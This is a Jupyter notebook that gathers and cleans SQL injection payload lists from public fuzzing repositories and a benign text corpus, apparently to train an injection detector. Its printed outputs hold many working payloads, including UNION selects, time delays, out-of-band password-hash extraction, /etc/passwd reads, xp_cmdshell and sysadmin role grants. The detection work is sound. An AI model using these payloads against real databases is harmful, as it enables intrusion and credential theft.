In [1]:
import glob
import time
import pandas as pd
# from xml.dom import minidom
from nltk import ngrams
from nltk.tokenize import sent_tokenize
import nltk
nltk.download('punkt')
nltk.download('stopwords')
nltk.download('wordnet')
from nltk.stem import PorterStemmer
from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.stem import WordNetLemmatizer
from nltk.corpus import stopwords 
from nltk.tokenize import word_tokenize

[nltk_data] Downloading package punkt to /home/ebryx/nltk_data...
[nltk_data]   Package punkt is already up-to-date!
[nltk_data] Downloading package stopwords to /home/ebryx/nltk_data...
[nltk_data]   Package stopwords is already up-to-date!
[nltk_data] Downloading package wordnet to /home/ebryx/nltk_data...
[nltk_data]   Package wordnet is already up-to-date!

In [2]:
import keras

Using TensorFlow backend.

In [3]:
import nltk
import pandas as pd
import os

### File_name: git_foospidy_payloads_fuzzing_code_db_sqli.txt
##### Comments :  
1. removed \n at the end of each line
2.  replaced %20 by space
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [4]:
def clean_sqli_data(data):
    for i in range(len(data)):
        data[i]=data[i].replace('\n', '')
        data[i]=data[i].replace('%20', ' ')
        data[i]=data[i].replace('=', ' = ')
        data[i]=data[i].replace('((', ' (( ')
        data[i]=data[i].replace('))', ' )) ')
        data[i]=data[i].replace('(', ' ( ')
        data[i]=data[i].replace(')', ' ) ')
    return data

In [5]:
path='./data/collection/git_foospidy_payloads_fuzzing_code_db_sqli.txt'

In [6]:
sql_lines_fuzzing=[]
f = open(path, "r")
for x in f:
    sql_lines_fuzzing.append(x)

In [7]:
sql_lines_fuzzing[:15]

["'sqlvuln\n",
 "'+sqlvuln\n",
 'sqlvuln;\n',
 '(sqlvuln)\n',
 "a' or 1=1--\n",
 '"a"" or 1=1--"\n',
 ' or a = a\n',
 "a' or 'a' = 'a\n",
 '1 or 1=1\n',
 "a' waitfor delay '0:0:10'--\n",
 "1 waitfor delay '0:0:10'--\n",
 'declare @q nvarchar (4000) select @q =\n',
 '0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A\n',
 '0\n',
 '031003000270000\n']

In [8]:
sql_lines_fuzzing=clean_sqli_data(sql_lines_fuzzing)

In [9]:
sql_lines_fuzzing[:15]

["'sqlvuln",
 "'+sqlvuln",
 'sqlvuln;',
 ' ( sqlvuln ) ',
 "a' or 1 = 1--",
 '"a"" or 1 = 1--"',
 ' or a  =  a',
 "a' or 'a'  =  'a",
 '1 or 1 = 1',
 "a' waitfor delay '0:0:10'--",
 "1 waitfor delay '0:0:10'--",
 'declare @q nvarchar  ( 4000 )  select @q  = ',
 '0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A',
 '0',
 '031003000270000']

### File_Name: git_foospidy_payloads_other_sqli_camoufl4g3.txt
##### Comments : ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [10]:
path='./data/collection/git_foospidy_payloads_other_sqli_camoufl4g3.txt'

In [11]:
sql_lines_camoufl4g3=[]
f = open(path, "r")
for x in f:
    sql_lines_camoufl4g3.append(x)

In [12]:
sql_lines_camoufl4g3[:15]

["'-'\n",
 "' '\n",
 "'&'\n",
 "'^'\n",
 "'*'\n",
 "' or ''-'\n",
 "' or '' '\n",
 "' or ''&'\n",
 "' or ''^'\n",
 "' or ''*'\n",
 '"-"\n',
 '" "\n',
 '"&"\n',
 '"^"\n',
 '"*"\n']

In [13]:
sql_lines_camoufl4g3=clean_sqli_data(sql_lines_camoufl4g3)

In [14]:
sql_lines_camoufl4g3[:15]

["'-'",
 "' '",
 "'&'",
 "'^'",
 "'*'",
 "' or ''-'",
 "' or '' '",
 "' or ''&'",
 "' or ''^'",
 "' or ''*'",
 '"-"',
 '" "',
 '"&"',
 '"^"',
 '"*"']

### File_Name: git_foospidy_payloads_other_sqli_libinjection-bypasses.txt
##### Comments: Should Remove &()o1: from start of each sentence
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [15]:
path='./data/collection/git_foospidy_payloads_other_sqli_libinjection-bypasses.txt'

In [16]:
sql_lines_bypasses=[]
f = open(path, "r")
for x in f:
    sql_lines_bypasses.append(x)

In [17]:
sql_lines_bypasses[:5]

['&()o1: select * from users where id=1 or (\\)=1 union select 1,@@VERSION -- 1\n',
 '&(.)o: select * from users where id=1 or (\\.)=1 union select 1,@@VERSION -- 1\n',
 '&(1&1: select * from users where id=1 or (\\+)=1 or 1=1 -- 1\n',
 '&(1)o: select * from users where id=1 or (1)=1 union select 1,banner from v$version where rownum=1 -- 1\n',
 '&(1UE: select * from users where id=1 or (\\+)=1 union select 1,@@VERSION -- 1\n']

In [18]:
sql_lines_bypasses=clean_sqli_data(sql_lines_bypasses)

In [19]:
sql_lines_bypasses[:5]

['& (  ) o1: select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 '& ( . ) o: select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 '& ( 1&1: select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 '& ( 1 ) o: select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 '& ( 1UE: select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

In [20]:
# if don't want &(*)* sign in beginning of each sentence then run next code else don't

for i in range(len(sql_lines_bypasses)):
    sentence=sql_lines_bypasses[i]
    sql_lines_bypasses[i]=sentence.split(':')[1]

In [21]:
sql_lines_bypasses[:5]

[' select * from users where id = 1 or  ( \\ )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\. )  = 1 union select 1,@@VERSION -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 or 1 = 1 -- 1',
 ' select * from users where id = 1 or  ( 1 )  = 1 union select 1,banner from v$version where rownum = 1 -- 1',
 ' select * from users where id = 1 or  ( \\+ )  = 1 union select 1,@@VERSION -- 1']

### File_Name: git_foospidy_payloads_owasp_sqli.txt
##### Comments: ok
#### Source: https://github.com/foospidy/payloads/tree/master/other/sqli

In [22]:
path='./data/collection/git_foospidy_payloads_owasp_sqli.txt'

In [23]:
sql_lines_owasp=[]
f = open(path, "r")
for x in f:
    sql_lines_owasp.append(x)

In [24]:
sql_lines_owasp[0:15]

['a\n',
 "a' \n",
 "a' --\n",
 "a' or 1=1; --\n",
 '@\n',
 '?\n',
 "' and 1=0) union all\n",
 '? or 1=1 --\n',
 "x' and userid is NULL; --\n",
 "x' and email is NULL; --\n",
 "anything' or 'x'='x\n",
 "x' and 1=(select count(*) from tabname); --\n",
 "x' and members.email is NULL; --\n",
 "x' or full_name like '%bob%\n",
 '23 or 1=1; --\n']

In [25]:
sql_lines_owasp=clean_sqli_data(sql_lines_owasp)

In [26]:
sql_lines_owasp[:15]

['a',
 "a' ",
 "a' --",
 "a' or 1 = 1; --",
 '@',
 '?',
 "' and 1 = 0 )  union all",
 '? or 1 = 1 --',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and 1 =  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 '23 or 1 = 1; --']

### File_Name: git_seclist_fuzzing_sqli_Generic-SQLi.txt
##### comments: should we remove %20 by spaces because %20 equals to space
#### Source: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/SQLi

In [27]:
path='./data/collection/git_seclist_fuzzing_sqli_Generic-SQLi.txt'

In [28]:
sql_lines_Generic=[]
f = open(path, "r")
for x in f:
    sql_lines_Generic.append(x)

In [29]:
sql_lines_Generic[:15]

[")%20or%20('x'='x\n",
 '%20or%201=1\n',
 "; execute immediate 'sel' || 'ect us' || 'er'\n",
 'benchmark(10000000,MD5(1))#\n',
 'update\n',
 '";waitfor delay \'0:0:__TIME__\'--\n',
 '1) or pg_sleep(__TIME__)--\n',
 '||(elt(-3+5,bin(15),ord(10),hex(char(45))))\n',
 '"hi"") or (""a""=""a"\n',
 'delete\n',
 'like\n',
 '" or sleep(__TIME__)#\n',
 'pg_sleep(__TIME__)--\n',
 '*(|(objectclass=*))\n',
 'declare @q nvarchar (200) 0x730065006c00650063 ...\n']

In [30]:
sql_lines_Generic=clean_sqli_data(sql_lines_Generic)

In [31]:
sql_lines_Generic[:15]

[" )  or  ( 'x' = 'x",
 ' or 1 = 1',
 "; execute immediate 'sel' || 'ect us' || 'er'",
 'benchmark ( 10000000,MD5 ( 1  )  )  #',
 'update',
 '";waitfor delay \'0:0:__TIME__\'--',
 '1 )  or pg_sleep ( __TIME__ ) --',
 '|| ( elt ( -3+5,bin ( 15 ) ,ord ( 10 ) ,hex ( char ( 45  )  )    )  )  ',
 '"hi"" )  or  ( ""a"" = ""a"',
 'delete',
 'like',
 '" or sleep ( __TIME__ ) #',
 'pg_sleep ( __TIME__ ) --',
 '* ( | ( objectclass = *  )  )  ',
 'declare @q nvarchar  ( 200 )  0x730065006c00650063 ...']

### File_name: scottparker_ml_sqli_src__trainingdata_plain.txt
##### Comments: 
removed last 22 records containing URLs
#### Source: https://github.com/tungpv98/Detect-Sql-Injection-by-Machine-Learning/tree/ebeb3287931677a3a42f11a7a08dbc13e374ff05/Sql-Injection/source/trainingdata

In [32]:
stop_words = set(stopwords.words('english')) 
def fun_remove_stop_words(posts):
    filtered=''
    for x in posts.split(' '):
        if x not in stop_words:
            filtered+=' '+x
    return filtered

In [33]:
path='./data/collection/'
file="scottparker_ml_sqli_src__trainingdata_plain.txt"

In [34]:
df = pd.read_csv(os.path.join(path,file), sep='Aw3s0meSc0t7', names=['benign'], header=None, engine='python')

In [35]:
df.head()

                                         benign
0                           Add plain text here
1                      Ne te quaesiveris extra.
2    Man is his own star; and the soul that can
3           Render an honest and a perfect man,
4  Commands all light, all influence, all fate;

In [36]:
plain_text=df['benign'].values

In [37]:
plain_text[:5]

array(['Add plain text here', 'Ne te quaesiveris extra.',
       'Man is his own star; and the soul that can',
       'Render an honest and a perfect man,',
       'Commands all light, all influence, all fate;'], dtype=object)

In [38]:
plain_text=plain_text[:-22] # removed last 22 records that were urls

In [39]:
len(plain_text)

3672

In [40]:
data=''
for x in plain_text:
    data+=" " + x

In [41]:
data=fun_remove_stop_words(data)
data=data.split('.')

In [42]:
for i in range(len(data)):
    data[i]=data[i].replace('<', ' <')
    data[i]=data[i].replace('>', '> ')
    data[i]=data[i].replace('=', ' = ')

In [43]:
data[:5]

['  Add plain text Ne te quaesiveris extra',
 ' Man star; soul Render honest perfect man, Commands light, influence, fate; Nothing falls early late',
 ' Our acts angels are, good ill, Our fatal shadows walk us still',
 ' Epilogue Beaumont Fletcher’s Honest Man’s Fortune Cast bantling rocks, Suckle she-wolf’s teat; Wintered hawk fox, Power speed hands feet',
 ' I read day verses written eminent painter original conventional']

Statistics

In [44]:
print("Benign records: %2i" %len(data))

Benign records: 3072

In [45]:
print(f"SQL fuzzing : {len(sql_lines_fuzzing)}  camoufl4gs : {len(sql_lines_camoufl4g3)} parsed : {len(sql_lines_bypasses)} owasp : {len(sql_lines_owasp)} generic : {len(sql_lines_Generic)} \n total sql injection data : {len(sql_lines_Generic)+len(sql_lines_owasp)+len(sql_lines_bypasses)+len(sql_lines_camoufl4g3)+len(sql_lines_fuzzing)} ")

SQL fuzzing : 142  camoufl4gs : 77 parsed : 474 owasp : 167 generic : 268
 total sql injection data : 1128

#### combination of all sqli attacks

In [46]:
all_sqli_sentence=sql_lines_owasp+sql_lines_bypasses+sql_lines_camoufl4g3+sql_lines_fuzzing+sql_lines_Generic

In [47]:
len(all_sqli_sentence)

1128

In [146]:
def optional_numeric_to_numeric(all_sqli_sentence):
    
    for i in range(len(all_sqli_sentence)):
        
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1 ', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 1', 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("'1 ", "'numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 1'", " numeric'")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1,', 'numeric,')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("1\ ", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("‘1", '‘numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 2 ", " numeric ")
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 3--', ' numeric--')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 4 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 5 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(' 6 ', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 7 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1234', ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("22", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 8 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 200 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("23 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('"1', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace('1"', '"numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("7659", 'numeric')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 37 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace(" 45 ", ' numeric ')
        all_sqli_sentence[i]=all_sqli_sentence[i].replace("pingnumeric", '1')
    
    return all_sqli_sentence

In [109]:
all_sqli_sentence

['a',
 "a' ",
 "a' --",
 "a' or numeric=numeric; --",
 '@',
 '?',
 "' and numeric= 0 )  union all",
 '? or numeric= numeric--',
 "x' and userid is NULL; --",
 "x' and email is NULL; --",
 "anything' or 'x' = 'x",
 "x' and numeric=  ( select count ( * )  from tabname ) ; --",
 "x' and members.email is NULL; --",
 "x' or full_name like '%bob%",
 ' numeric or numeric=numeric; --',
 "'; exec master..xp_cmdshell '172.10.1.255'--",
 'a',
 'numericor numeric=numeric',
 "numeric' or 'numeric' = 'numeric",
 "numericand user_name (  )   =  'dbo'",
 '1',
 "numeric'numeric",
 'numericexec sp_  ( or exec xp_ ) ',
 'numericand numeric=numeric',
 "numeric' and numeric=  ( select count ( * )  from tablenames ) ; --",
 '1',
 "numericand user_name (  )   =  'dbo'",
 "\\'; desc users; --",
 "1\\'numeric",
 "numeric' and non_existant_table  =  'numeric",
 "' or username is not NULL or username  =  '",
 "numericand ascii ( lower ( substring  (  (  select top numericname from sysobjects where xtype = 'u' ) , numeric, numeric )  )   )  >numeric16",
 "numericunion all select numeric,2,3,4,5,6,name from sysobjects where xtype  =  'u' --",
 'numericuni/**/on select all from where',
 '’ or ‘numeric’ = ’1',
 "' or 'numeric' = 'numeric",
 "'||utl_http.request ( 'httP://192.168.1.1/' ) ||'",
 "' || myappadmin.adduser ( 'admin', 'newpass' )  || '",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT banner FROM v$version WHERE ROWNUM = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT SYS.LOGIN_USER FROM DUAL  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT SYS.DATABASE_NAME FROM DUAL  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT host_name FROM v$instance  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT global_name FROM global_name  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( USERNAME  )  )   FROM SYS.ALL_USERS  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( PASSWORD  )  )   FROM SYS.USER$  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( table_name  )  )   FROM sys.all_tables  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( column_name  )  )   FROM sys.all_tab_columns  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT COUNT ( DISTINCT ( GRANTED_ROLE  )  )   FROM DBA_ROLE_PRIVS WHERE GRANTEE = SYS.LOGIN_USER  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( USERNAME )  FROM  ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( PASSWORD )  FROM  ( SELECT DISTINCT ( PASSWORD ) , ROWNUM AS LIMIT FROM SYS.USER$ )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( table_name )  FROM  ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( column_name )  FROM  ( SELECT DISTINCT ( column_name ) , ROWNUM AS LIMIT FROM all_tab_columns )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "' AND numeric= utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = numeric  )  )   AND 'i' = 'i",
 "'|| ( elt ( -3+5,bin (numeric ) ,ord (numeric0 ) ,hex ( char ( numeric  )  )    )  )  ",
 '||6',
 "'||'6",
 ' ( ||6 ) ',
 "' or numeric=numeric-- ",
 'or numeric=numeric',
 "' or 'numeric' = 'numeric",
 "; or 'numeric' = 'numeric'",
 '" or isNULL (numeric/0 )  /*',
 "' or 'numeric' = 'numeric",
 '" or isNULL (numeric/0 )  /*',
 "' -- ",
 "' or numeric=numeric--",
 '" or numeric=numeric--',
 "' or numeric= numeric/*",
 'or numeric=numeric--',
 "' or 'a' = 'a",
 '" or "a" = "a',
 "' )  or  ( 'a' = 'a",
 "admin' or '",
 "' select * from information_schema.tables--",
 ' )  union select * from information_schema.tables;',
 "' having numeric=numeric--",
 "' having numeric=numeric--",
 "' group by userid having numeric=numeric--",
 "' select name from syscolumns where id  =   ( select id from sysobjects where name  =  tablename' ) --",
 "' or numericin  ( select @@version ) --",
 "' union all select @@version--",
 "' or 'unusual'  =  'unusual'",
 "' or 'something'  =  'some'+'thing'",
 "' or 'text'  =  n'text'",
 "' or 'something' like 'some%'",
 "' or numeric >numeric",
 "' or 'text' > 't'",
 "' or 'whatever' in  ( 'whatever' ) ",
 "' or numeric between numericand 3",
 "' or username like char ( numeric ) ;",
 "' union select * from users where login  =  char (numeric14,11numeric,11numeric,116 ) ;",
 "' union select ",
 'password:*/ =numeric--',
 'uni/**/on sel/**/ect',
 "'; execute immediate 'sel' || 'ect us' || 'er'",
 "'; exec  ( 'sel' + 'ect us' + 'er' ) ",
 "'/**/or/**/1/**/ = /**/1",
 "' ornumeric/*",
 ' or isNULL (numeric/0 )  /*',
 "' or 'numeric' = 'numeric",
 '" or isNULL (numeric/0 )  /*',
 "' -- &password = ",
 "'; begin declare @var varchar ( 8000 )  set @var = ':' select @var = @var+'+login+'/'+password+' ' from users where login > ",
 '@var select @var as var into temp end --',
 "' and numericin  ( select var from temp ) --",
 "' union select numeric,load_file ( '/etc/passwd' ) ,numeric,numeric,1;",
 '1; ( load_file ( char ( 47,10numeric,116,99,47,112,97,115,115,119,100  )  )   ) ,numeric,numeric,1;',
 "' and numeric=  (  if  (  (  load_file ( char (numeric10,46,10numeric,120,116  )  )  <>char ( 39,39  )  )  ,numeric,0  )  )  ;",
 "'; exec master..xp_cmdshell '10.10.1.2'--",
 "create user name identified by 'pass123'",
 'create user name identified by passnumericnumeric temporary tablespace temp default tablespace users; ',
 "' ; drop table temp --",
 "exec sp_addlogin 'name' , 'password'",
 "exec sp_addsrvrolemember 'name' , 'sysadmin'",
